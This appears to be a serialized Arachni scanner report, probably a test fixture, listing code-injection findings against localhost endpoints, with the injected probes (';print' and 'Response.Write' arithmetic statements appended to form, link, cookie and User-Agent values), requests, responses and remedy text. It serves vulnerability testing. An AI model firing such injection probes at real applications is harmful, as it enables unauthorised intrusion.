internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:6875/python/form/append
elem: form
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:param_flip: false
:injected_orig: ;print 287630581954+4196403186331128
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default;print 287630581954+4196403186331128
:follow_location: true
:injected: default;print 287630581954+4196403186331128
:combo:
!binary "aW5wdXQ=": default;print 287630581954+4196403186331128
:action: http://localhost:6875/python/form/append
:verification: false
:id: '4196690816913082'
var: input
url: http://localhost:6875/python/form/append
injected: default;print 287630581954+4196403186331128
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: form
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjo0OSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: true
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:6875/python/link/append?input=default
elem: link
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:param_flip: false
:injected_orig: ;print 287630581954+4196403186331128
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": default;print 287630581954+4196403186331128
:follow_location: true
:injected: default;print 287630581954+4196403186331128
:combo:
!binary "aW5wdXQ=": default;print 287630581954+4196403186331128
:action: http://localhost:6875/python/link/append?input=default
:verification: false
:id: '4196690816913082'
var: input
url: http://localhost:6875/python/link/append?input=default
injected: default;print 287630581954+4196403186331128
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: link
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjo1MSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:6875/python/link/straight?input=default
elem: link
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:param_flip: false
:injected_orig: ;print 287630581954+4196403186331128
:altered: !binary |-
aW5wdXQ=
:element: link
:params:
!binary "aW5wdXQ=": ;print 287630581954+4196403186331128
:follow_location: true
:injected: ;print 287630581954+4196403186331128
:combo:
!binary "aW5wdXQ=": ;print 287630581954+4196403186331128
:action: http://localhost:6875/python/link/straight?input=default
:verification: false
:id: '4196690816913082'
var: input
url: http://localhost:6875/python/link/straight?input=default
injected: ;print 287630581954+4196403186331128
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: link
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjo1MSBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: cookie
url: http://localhost:6875/python/cookie/straight
elem: cookie
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:injected_orig: ;print 287630581954+4196403186331128
:altered: !binary |-
Y29va2ll
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2ll": ;print 287630581954+4196403186331128
:injected: ;print 287630581954+4196403186331128
:combo:
!binary "Y29va2ll": ;print 287630581954+4196403186331128
:action: http://localhost:6875/python/cookie/straight
:verification: false
:id: '4196690816913082'
var: cookie
url: http://localhost:6875/python/cookie/straight
injected: ;print 287630581954+4196403186331128
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: cookie
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=%3Bprint+287630581954%2B4196403186331128;cookie2=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjo1NCBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: cookie2
url: http://localhost:6875/python/cookie/append
elem: cookie
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:injected_orig: ;print 287630581954+4196403186331128
:altered: !binary |-
Y29va2llMg==
:element: cookie
:params: {}
:follow_location: true
:cookies:
!binary "Y29va2llMg==": cookie value;print 287630581954+4196403186331128
:injected: cookie value;print 287630581954+4196403186331128
:combo:
!binary "Y29va2llMg==": cookie value;print 287630581954+4196403186331128
:action: http://localhost:6875/python/cookie/append
:verification: false
:id: '4196690816913082'
var: cookie2
url: http://localhost:6875/python/cookie/append
injected: cookie value;print 287630581954+4196403186331128
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: cookie
remarks:
:stuff:
- Blah
- Blah2
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie=cookie+value;cookie2=cookie+value%3Bprint+287630581954%2B4196403186331128
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNjo1NiBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: User-Agent
url: http://localhost:6875/python/header/append
elem: header
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:injected_orig: ;print 287630581954+4196403186331128
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: arachni_user;print 287630581954+4196403186331128
:injected: arachni_user;print 287630581954+4196403186331128
:combo:
User-Agent: arachni_user;print 287630581954+4196403186331128
:action: http://localhost:6875/python/header/append
:verification: false
:id: '4196690816913082'
var: User-Agent
url: http://localhost:6875/python/header/append
injected: arachni_user;print 287630581954+4196403186331128
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: header
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: arachni_user;print 287630581954+4196403186331128
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNzowMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: User-Agent
url: http://localhost:6875/python/header/straight
elem: header
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:injected_orig: ;print 287630581954+4196403186331128
:altered: User-Agent
:element: header
:params:
:follow_location: true
:headers:
User-Agent: ;print 287630581954+4196403186331128
:injected: ;print 287630581954+4196403186331128
:combo:
User-Agent: ;print 287630581954+4196403186331128
:action: http://localhost:6875/python/header/straight
:verification: false
:id: '4196690816913082'
var: User-Agent
url: http://localhost:6875/python/header/straight
injected: ;print 287630581954+4196403186331128
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: header
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: ;print 287630581954+4196403186331128
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNzowNyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:6875/asp/form/append
elem: form
method: GET
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:param_flip: false
:injected_orig: ;Response.Write(287630581954+4196403186331128)
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": default;Response.Write(287630581954+4196403186331128)
:follow_location: true
:injected: default;Response.Write(287630581954+4196403186331128)
:combo:
!binary "aW5wdXQ=": default;Response.Write(287630581954+4196403186331128)
:action: http://localhost:6875/asp/form/append
:verification: false
:id: '4196690816913082'
var: input
url: http://localhost:6875/asp/form/append
injected: default;Response.Write(287630581954+4196403186331128)
id: '4196690816913082'
regexp: '4196690816913082'
regexp_match: '4196690816913082'
elem: form
remarks: {}
method: GET
response: ! '[4196690816913082]'
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
Cookie: cookie2=cookie+value;cookie=cookie+value
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
MTg=
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwMToxNzoxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations: []
internal_modname: CodeInjection
internal_modname: CodeInjection
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
var: input
url: http://localhost:6875/asp/form/straight
elem: form
method: POST
name: Code injection
description: ! "Arbitrary code can be injected into the web application\n which
is then executed as part of the system."
tags:
- code
- injection
- regexp
cwe: '94'
cwe_url: http://cwe.mitre.org/data/definitions/94.html
severity: High
cvssv2: '7.5'
remedy_guidance: ! "User inputs must be validated and filtered\n before being
evaluated as executable code.\n Better yet, the web application should stop
evaluating user\n inputs as any part of dynamic code altogether."
remedy_code: ''
metasploitable: unix/webapp/arachni_php_eval
mod_name: Code injection
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
PHP: http://php.net/manual/en/function.eval.php
Perl: http://perldoc.perl.org/functions/eval.html
Python: http://docs.python.org/py3k/library/functions.html#eval
ASP: http://www.aspdev.org/asp/asp-eval-execute/
Ruby: http://en.wikipedia.org/wiki/Eval#Ruby
opts:
:redundant: false
:async: true
:regexp: '4196690816913082'
:match: '4196690816913082'
:substring: '4196690816913082'
:ignore:
:elements:
- link
- form
- cookie
- header
- body
:train:
:format:
- 2
- 1
:param_flip: false
:injected_orig: ! '";Response.Write(287630581954+4196403186331128)#'
:altered: !binary |-
aW5wdXQ=
:element: form
:params:
!binary "aW5wdXQ=": ! '";Response.Write(287630581954+4196403186331128)#'
:follow_location: true
:injected: ! '";Response.Write(287630581954+4196403186331128)#'
:combo:
!binary "aW5wdXQ=": ! '";Response.Write(287630581954+4196403186331128)#'
:action: http://localhost:6875/asp/form/straight
:verification: false
:id: '4196690816913082'
var: input
url: http://localhost:6875/asp/form/straight
